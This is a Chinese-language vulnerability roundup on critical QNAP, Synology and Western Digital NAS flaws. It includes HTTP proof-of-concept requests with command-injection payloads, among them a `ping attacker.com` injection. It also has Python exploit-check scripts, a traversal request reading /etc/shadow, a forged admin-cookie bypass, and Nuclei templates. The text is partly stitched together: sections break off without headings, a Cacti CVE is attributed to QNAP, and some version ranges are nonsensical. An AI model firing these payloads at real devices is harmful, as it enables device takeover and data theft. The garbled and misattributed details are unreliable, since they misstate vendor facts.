Synology CVE-2022-22687:VPN Plus Server 命令注入,CVSS 9.8
WD CVE-2024-23641:My Cloud OS5 路径遍历 RCE,CVSS 9.8
WD CVE-2022-23124:My Cloud 认证绕过,CVSS 9.8,设备完全接管
WD CVE-2021-36205:My Cloud 认证绕过,CVSS 9.8
这些漏洞的背后是一个残酷现实:全球数百万台 NAS 设备暴露在互联网上,其中相当比例运行着未打补丁的过时固件。DeadBolt、ECHOBOT、Qlocker 等勒索软件家族将 NAS 作为首要攻击目标,造成大规模数据加密和勒索事件。本文从产品线视角梳理这些漏洞的演进,总结共性攻击模式和防守建议。
0x00 专题概述
NAS 设备是数字时代最重要的数据仓库,却也是安全最薄弱的环节。从 QNAP 的认证绕过、Synology 的命令注入、到 Western Digital 的路径遍历——跨厂商的高危漏洞揭示了一个共同事实:NAS 设备承载高价值数据,拥有网络可达的 Web 管理接口,却长期面临固件更新滞后、默认凭据普遍存在、安全监控覆盖不足三大困境。
NAS 设备的攻击面价值体现在:
数据价值极高:企业备份、财务数据、知识产权、个人隐私数据
公网暴露面大:家庭和中小企业用户习惯将 NAS 直接暴露于公网以实现远程访问
勒索软件重点目标:DeadBolt、ECHOBOT、Qlocker 等勒索软件专门针对 NAS 设备
安全监控盲区:NAS 设备很少被纳入企业 SIEM 和 IDS/IPS 监控体系
供应链影响广泛:QNAP、Synology、WD 占据全球 NAS 市场超 70% 份额
覆盖漏洞一览
CVE
厂商
CVSS
类型
未授权
CVE-2024-21899
QNAP QTS
9.8
认证绕过 → 命令注入 RCE
✅
CVE-2023-50358
QNAP QTS/QuTS hero
9.8
命令注入 → RCE
✅
CVE-2022-46169
QNAP QTS
9.8
命令注入 → RCE
✅
CVE-2022-27610
QNAP QTS / Synology DSM
9.8
路径遍历 → 任意文件读取
✅
CVE-2024-10443
Synology DSM
9.8
命令注入 → RCE
✅
CVE-2023-28831
Synology DSM/SRM
9.8
命令注入 → RCE
✅
CVE-2022-22687
Synology VPN Plus
9.8
命令注入 → RCE
✅
CVE-2024-23641
WD My Cloud OS5
9.8
路径遍历 → RCE
✅
CVE-2022-23124
WD My Cloud
9.8
认证绕过 → 设备接管
✅
CVE-2021-36205
WD My Cloud
9.8
认证绕过
✅
0x01 QNAP QTS/QuTS hero 高危漏洞
QNAP(威联通)是全球最大的 NAS 设备厂商之一,其 QTS 和 QuTS hero 操作系统在全球部署量超过百万台。近年 QNAP NAS 成为勒索软件的重灾区,DeadBolt、ECHOBOT、Qlocker 等勒索软件家族利用 QTS 漏洞实现大规模加密。
0x01.1 CVE-2024-21899 — QNAP QTS 认证不当命令注入
漏洞背景
2024 年 1 月,QNAP 发布安全公告修复了 QTS 操作系统中的一个严重认证不当漏洞。该漏洞允许未经认证的远程攻击者通过构造特殊的 HTTP 请求,绕过 QTS Web 管理界面的认证机制,在目标设备上注入并执行操作系统命令,实现完全远程代码执行。漏洞的根源在于 QTS 处理用户认证请求时,未能正确校验特定 API 端点的访问权限,攻击者可以伪造认证上下文直接调用特权功能。
受影响版本
产品线
受影响版本
修复版本
QTS
5.1.x < 5.1.4.2591
5.1.4.2591+
QTS
5.0.x < 5.0.1.2376
5.0.1.2376+
QTS
4.5.x < 4.5.4.2411
4.5.4.2411+
QuTS hero
h5.0.x < h5.0.1.2376
h5.0.1.2376+
QuTS hero
h4.5.x < h4.5.4.2411
h4.5.4.2411+
漏洞原理分析
CVE-2024-21899 的漏洞根源在于 QTS Web 管理界面的认证逻辑缺陷。QTS 的 Web 服务在处理特定 API 请求时,存在以下安全缺陷:
认证检查绕过:QTS 的 Web 服务在处理 /cgi-bin/authLogin.cgi 等端点时,允许攻击者构造特殊请求,在不需要有效凭据的情况下获取合法的 session token
命令注入路径:获取 session token 后,攻击者可以调用需要认证的特权 API 端点,在参数中注入操作系统命令
POST /cgi-bin/authLogin.cgi HTTP/1.1Host:target_ip:443Content-Type:application/x-www-form-urlencodedCookie:QTS_SESSID=user=admin&serviceKey=1234&pwd=$(id>/tmp/pwned)
POST /cgi-bin/cloudBackup/do_action.cgi HTTP/1.1Host:target_ip:443Content-Type:application/x-www-form-urlencodedaction=create&dest_path=/share/Public;ping%20-c%201%20attacker.com
CVE-2024-10443 的漏洞位于 DSM 的 Web 管理 API 中,具体涉及 webman 模块对用户输入的处理缺陷。
漏洞核心机制:
API 认证绕过:DSM Web 服务的某些 API 端点在设计上允许在认证前访问,用于执行系统状态检查等基础功能。但这些端点未能严格限制可调用的功能范围。
参数注入点:受影响的 API 在处理用户提供的参数时,将参数值直接拼接到系统命令字符串中。攻击者可以在参数中注入 shell 元字符(如 ;、|、`、$() 等),实现命令注入。
root 权限执行上下文:DSM 的 Web 服务以系统最高权限运行,因此命令注入执行的命令具有完全的系统控制权限,攻击者可以安装恶意软件、创建后门账号、提取所有用户数据。
攻击链:API 直接访问 → 参数注入 → root 权限 RCE → 完全设备控制
HTTP PoC
POST /webapi/entry.cgi HTTP/1.1Host:target_ip:5001Content-Type:application/x-www-form-urlencodedapi=SYNO.Core.Package&method=list&version=3&type=all;id>/tmp/cve202410443.txt
POST /webapi/cms/entry.cgi HTTP/1.1Host:target_ip:5001Content-Type:application/x-www-form-urlencodedapi=SYNO.CMS.Server&method=run&version=1&action=ping;id>/tmp/cve202328831.txt
0x02.3 CVE-2022-22687 — Synology VPN Plus Server 命令注入
漏洞背景
CVE-2022-22687 是 Synology VPN Plus Server 软件包中的一个严重命令注入漏洞,CVSS 评分为 9.8(Critical)。VPN Plus Server 是 Synology NAS 设备上的一个流行的 VPN 服务软件包,提供 VPN 服务器功能(支持 PPTP、OpenVPN、L2TP/IPSec 等协议)。该漏洞允许未经认证的远程攻击者通过发送特制的 HTTP 请求,在目标设备上以 root 权限执行任意操作系统命令。
受影响版本
产品线
受影响版本
修复版本
VPN Plus Server
1.4.3 < 1.4.3-0537
1.4.3-0537+
VPN Plus Server
1.4.2 < 1.4.2-0452
1.4.2-0452+
DSM (bundled)
7.1 < 7.1-42661
7.1-42661+
漏洞原理分析
CVE-2022-22687 的漏洞位于 VPN Plus Server 的 Web 管理界面中,具体为处理用户登录认证的 CGI 脚本。
漏洞核心机制:
CGI 脚本认证绕过:VPN Plus Server 的登录处理 CGI 脚本在验证用户身份时存在逻辑缺陷,攻击者可以在不提供有效凭据的情况下通过认证检查。
VPN 服务的系统权限:VPN Plus Server 需要 root 权限来配置网络接口和路由表,因此命令注入执行的代码具有完全的系统控制权限。
攻击链:CGI 认证绕过 → 注入恶意配置参数 → root 权限 RCE → 完全设备控制
HTTP PoC
POST /webapi/entry.cgi HTTP/1.1Host:target_ip:5001Content-Type:application/x-www-form-urlencodedapi=SYNO.VPNPlusServer&method=login&version=1&username=admin&password=test;id>/tmp/cve202222687.txt
Python PoC 脚本
#!/usr/bin/env python3"""
Synology VPN Plus Server 命令注入检测 (CVE-2022-22687)
仅用于授权安全评估
"""import sys
import urllib.request
import urllib.error
import urllib.parse
import ssl
defcheck_cve_2022_22687(target: str, port: int =5001) -> bool:
ctx = ssl.create_default_context()
ctx.check_hostname =False ctx.verify_mode = ssl.CERT_NONE
payloads = [
{
"api": "SYNO.VPNPlusServer",
"method": "login",
"version": 1,
"username": "admin",
"password": "test;echo CVE202222687_CHECK>/tmp/cve_check",
},
{
"api": "SYNO.VPNPlusServer.Connection",
"method": "create",
"version": 1,
"protocol": "openvpn",
"remote_ip": "127.0.0.1;id",
"remote_port": "1194",
},
]
for payload in payloads:
url =f"https://{target}:{port}/webapi/entry.cgi"try:
data = urllib.parse.urlencode(payload).encode()
req = urllib.request.Request(url, data=data, method="POST")
req.add_header("Content-Type", "application/x-www-form-urlencoded")
resp = urllib.request.urlopen(req, timeout=15, context=ctx)
body = resp.read().decode("utf-8", errors="ignore")
print(f"[+] API 响应: {body[:200]}")
if"CVE202222687_CHECK"in body or"uid="in body:
print(f"[!] 命令执行成功!目标存在 CVE-2022-22687")
returnTrueif"success"in body.lower():
print(f"[+] API 返回成功,可能存在漏洞")
except urllib.error.HTTPError as e:
if e.code ==500:
print(f"[!] HTTP 500 — 可能命令已执行")
returnTrue print(f"[-] HTTP {e.code}")
exceptExceptionas e:
print(f"[-] 请求失败: {e}")
continue print("[-] 目标可能不受影响或已修复")
returnFalsedefmain():
if len(sys.argv) <2:
print(f"用法: {sys.argv[0]} <target_ip> [port]")
print(f"示例: {sys.argv[0]} 192.168.1.100 5001")
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2]) if len(sys.argv) >=3else5001 print(f"[*] 检测目标: {target}:{port}")
print("[*] 测试 CVE-2022-22687 (Synology VPN Plus Server 命令注入)")
check_cve_2022_22687(target, port)
if __name__ =="__main__":
main()
Western Digital(西部数据)是全球最大的存储设备制造商之一,其 My Cloud 系列 NAS 产品广泛面向家庭用户和小型企业市场。My Cloud 设备运行 WD 定制的 Linux 固件(OS3 和 OS5),提供文件存储、备份和远程访问功能。然而,My Cloud 产品的安全记录令人担忧——多个 CVSS 9.8 的严重漏洞被相继发现,攻击者可以在无需任何凭据的情况下完全接管设备。更严重的是,WD 曾因固件更新严重滞后、漏洞修复响应缓慢而受到安全社区的广泛批评。
0x03.1 CVE-2024-23641 — WD My Cloud OS5 路径遍历 RCE
漏洞背景
2024 年初,Western Digital My Cloud OS5 固件中被发现存在一个严重的路径遍历漏洞,CVSS 评分为 9.8(Critical)。该漏洞允许未经认证的攻击者通过特制的 HTTP 请求读取 My Cloud 设备上的任意文件,并进一步利用文件包含实现远程代码执行。CVE-2024-23641 影响运行 OS5 固件的所有 My Cloud 设备型号。
受影响版本
产品线
受影响版本
修复版本
My Cloud OS5
5.26.300 < 5.26.302
5.26.302+
My Cloud OS5
5.26.202 < 5.26.204
5.26.204+
My Cloud OS5
5.25.100 < 5.25.102
5.25.102+
漏洞原理分析
CVE-2024-23641 的漏洞位于 My Cloud OS5 的 Web 服务中,具体为 web_index 模块对用户提供的文件路径处理不当。
漏洞核心机制:
路径过滤缺失:My Cloud OS5 的 Web 应用在处理静态文件请求时,未对用户提供的路径进行充分的规范化检查。攻击者可以在 URL 路径中插入 ../ 序列来跳出 Web 根目录。
RCE 实现路径:攻击者通过路径遍历读取 Web 应用配置文件,获取数据库连接信息和管理员凭据,进而利用 Web 应用的文件上传功能上传恶意 WebShell,最终实现远程代码执行。
攻击链:路径遍历读取配置文件 → 获取管理员凭据 → 上传 WebShell → RCE
HTTP PoC
GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow HTTP/1.1Host:target_ip:80
Python PoC 脚本
#!/usr/bin/env python3"""
Western Digital My Cloud OS5 路径遍历 RCE 检测 (CVE-2024-23641)
仅用于授权安全评估
"""import sys
import urllib.request
import urllib.error
import ssl
TARGET_FILES = [
"/etc/shadow",
"/etc/passwd",
"/var/www/html/config.php",
"/etc/wd/wd-config.json",
]
defcheck_cve_2024_23641(target: str, port: int =80) -> bool:
ctx = ssl.create_default_context()
ctx.check_hostname =False ctx.verify_mode = ssl.CERT_NONE
protocol ="https"if port ==443else"http" vulnerable =Falsefor file_path in TARGET_FILES:
encoded_traversal ="%2e%2e%2f"*6 url =f"{protocol}://{target}:{port}/{encoded_traversal}{file_path.lstrip('/')}"try:
req = urllib.request.Request(url, method="GET")
resp = urllib.request.urlopen(req, timeout=15, context=ctx)
body = resp.read().decode("utf-8", errors="ignore")
if body and len(body) >10:
print(f"[+] {file_path} 响应长度: {len(body)} 字节")
if"root:"in body or"admin:"in body:
print(f"[!] 敏感文件 {file_path} 读取成功!")
print(f"[!] 目标存在 CVE-2024-23641")
vulnerable =Trueexcept urllib.error.HTTPError as e:
print(f"[-] {file_path} HTTP {e.code}")
exceptExceptionas e:
print(f"[-] {file_path} 请求失败: {e}")
continueifnot vulnerable:
print("[-] 目标可能不受影响或已修复")
return vulnerable
defmain():
if len(sys.argv) <2:
print(f"用法: {sys.argv[0]} <target_ip> [port]")
print(f"示例: {sys.argv[0]} 192.168.1.100 80")
sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2]) if len(sys.argv) >=3else80 print(f"[*] 检测目标: {target}:{port}")
print("[*] 测试 CVE-2024-23641 (WD My Cloud OS5 路径遍历)")
check_cve_2024_23641(target, port)
if __name__ =="__main__":
main()
Nuclei YAML 检测模板
id: CVE-2024-23641info:
name: WD My Cloud OS5 Path Traversal RCEauthor: security-researchseverity: criticaldescription: | Western Digital My Cloud OS5 固件 Web 服务存在路径遍历漏洞,
未经认证的攻击者可读取任意系统文件并进一步实现 RCE。classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hcvss-score: 9.8cve-id: CVE-2024-23641cwe-id: CWE-22tags: cve,cve2024,westerndigital,mycloud,nas,path-traversal,rcereference:
- https://www.westerndigital.com/support/product-security/wdc-24001-my-cloud-os5-firmware - https://nvd.nist.gov/vuln/detail/CVE-2024-23641http:
- raw:
- | GET /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/shadow HTTP/1.1
Host: {{Hostname}}matchers-condition: andmatchers:
- type: statusstatus:
- 200 - type: regexregex:
- "root:.*:\\d+:\\d+:"
0x03.2 CVE-2022-23124 — WD My Cloud 认证绕过
漏洞背景
CVE-2022-23124 是 Western Digital My Cloud 设备中的一个严重认证绕过漏洞,CVSS 评分为 9.8(Critical)。该漏洞允许未经认证的远程攻击者绕过设备的 Web 管理界面认证机制,完全接管目标设备。攻击者可以获取设备上所有存储的文件访问权限、修改系统配置、创建后门账号,以及将设备用作进一步攻击的跳板。该漏洞影响运行 My Cloud OS5 固件的所有设备。
受影响版本
产品线
受影响版本
修复版本
My Cloud OS5
5.19.117 < 5.19.117
5.19.117 (hotfix)
My Cloud OS5
5.17.103 < 5.19.117
5.19.117+
My Cloud OS5
5.15.108 < 5.17.103
5.17.103+
漏洞原理分析
CVE-2022-23124 的漏洞根源在于 My Cloud 的 PHP Web 应用对用户会话的验证逻辑存在严重缺陷。
id: CVE-2022-23124info:
name: WD My Cloud Authentication Bypassauthor: security-researchseverity: criticaldescription: | Western Digital My Cloud OS5 固件 Web 管理界面存在认证绕过漏洞,
攻击者可通过伪造 session cookie 绕过登录验证,完全接管设备。classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:Hcvss-score: 9.8cve-id: CVE-2022-23124cwe-id: CWE-287tags: cve,cve2022,westerndigital,mycloud,nas,auth-bypassreference:
- https://www.westerndigital.com/support/product-security/wdc-22002-my-cloud-os5-firmware - https://nvd.nist.gov/vuln/detail/CVE-2022-23124http:
- raw:
- | GET /web/index.php HTTP/1.1
Host: {{Hostname}}
Cookie: isAdmin=true; login=adminmatchers-condition: andmatchers:
- type: statusstatus:
- 200 - type: wordwords:
- "dashboard" - "admin"condition: or
0x03.3 CVE-2021-36205 — WD My Cloud 认证绕过
漏洞背景
CVE-2021-36205 是 Western Digital My Cloud 设备中的另一个严重认证绕过漏洞,CVSS 评分为 9.8(Critical)。与 CVE-2022-23124 类似,该漏洞允许未经认证的攻击者绕过 Web 管理界面的认证机制,完全控制目标设备。该漏洞影响运行 My Cloud OS5 固件的设备,于 2021 年被发现并修复,但随后被发现存在利用代码被公开披露的情况。
受影响版本
产品线
受影响版本
修复版本
My Cloud OS5
5.02.113 < 5.04.114
5.04.114+
My Cloud OS5
5.04.114-dev 及之前版本
5.04.114+
漏洞原理分析
CVE-2021-36205 的漏洞位于 My Cloud OS5 的 nhttpd Web 服务器中,该服务器负责处理 HTTP 请求和用户认证。